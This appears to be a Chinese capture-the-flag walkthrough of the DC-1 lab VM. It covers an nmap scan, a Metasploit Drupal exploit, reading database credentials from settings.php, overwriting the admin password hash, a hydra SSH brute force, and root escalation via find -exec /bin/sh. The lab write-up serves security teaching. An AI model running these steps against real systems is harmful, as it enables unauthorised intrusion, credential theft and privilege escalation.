DC-1靶机渗透
实验环境
- Vmware workstation
- kali2020
- DC-1
- DC-1靶机网卡和kali是一样的
- kali 的ip地址:192.168.6.129
主机发现
第一种方法:使用VMware去查看DC-1靶机的MAC地址;第二种方法:直接进行主机发现。用命令扫描网段存活主机。
nmap -sP 192.168.6.0/24
发现靶机IP为:192.168.6.131
信息收集
使用 nmap 扫描常用端口
发现开放了22,80,111端口,以及主机信息
浏览器访问80端口:
三大PHP CMS网站:Drupal、 Wordpress、Joomla
漏洞利用
启动metasploit,搜索drupal模块。
可以采用2018-03-28漏洞
run之后拿到了会话。
查找flag
查看网站目录结构,发现flag1
查看flag1
配置文件在/sites/default/settings.php
于是就找到了flag2
还有这个数据库
$databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupaldb', 'username' => 'dbuser', 'password' => 'R0ck3t', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ), );
远程连接一下
权限提升
执行拿shell,shell反弹
python -c 'import pty;pty.spawn("/bin/bash")'
连接数据库,用户名和密码数据库有
www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t
接着查看数据库
这里要破解密文,可以使用暴力破解或者是在数据库中更新密码
使用更新密码:
www-data@DC-1:/var/www$ php scripts/password-hash.sh mima
进入数据库更新密码
update users set pass="$S$D3hDIvluBADLbum3hEV/k5RdfDVmXG02l2ChwWzyQO/fsJ1Nwzgs" where uid=1;
然后登录一下,用户名是admin ,密码是mima
发现flag3
接着找
www-data@DC-1:/var/www$ cat /etc/passwd
发现flag4,该服务器开放了22端口,我们可以使用九头蛇工具爆破密码:
hydra -l flag4 -P /usr/share/john/password.lst 192.168.6.131 ssh -vV -f -o hydra.ssh
拿到密码
用ssh登录
使用find命令提升权限
shell命令
find ./ aaa -exec '/bin/sh' \;
whoami
cd /root
ls
cat thefinalflag.txt
看到Well done!!!!,就知道已经结束了,这俩钟头,可以睡个好觉了。